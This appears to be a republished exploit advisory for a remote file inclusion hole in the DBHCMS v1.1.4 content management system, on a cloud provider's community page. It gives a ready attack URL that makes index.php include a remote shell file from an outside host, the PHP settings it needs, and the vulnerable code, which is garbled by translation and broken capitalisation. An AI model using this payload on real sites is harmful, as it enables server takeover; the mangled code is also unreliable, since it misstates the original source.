DBHCMS Web Content Management System v1.1.4 RFI & amp; nb

Source: Internet
Author: User

# Exploit:

Vuln file: index. php

Exploit:

Target :? Dbhcms_core_dir = http://site.com/shell.txt%00

/* Need register_globals = ON and allow_url_include = ON without a second yuzaetsya as LFI */

Index. php

Function dbhcms_init ($ core ){

$ Init = $ core. init. php;

$ Page = $ core. page. php;

If (is_file ($ init) & (is_file ($ page ))){

Require_once ($ init );

Require_once ($ page );

} Else {

Die (<div style = "color: #872626; font-weight: bold;">

Fatal error-cocould not find the initialation files.

Please check the "$ dbhcms_core_dir" parameter in the "config. php" and make

Shure the directory is correct.

</Div> );

}

}

......

Dbhcms_init ($ GLOBALS [dbhcms_core_dir]);

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.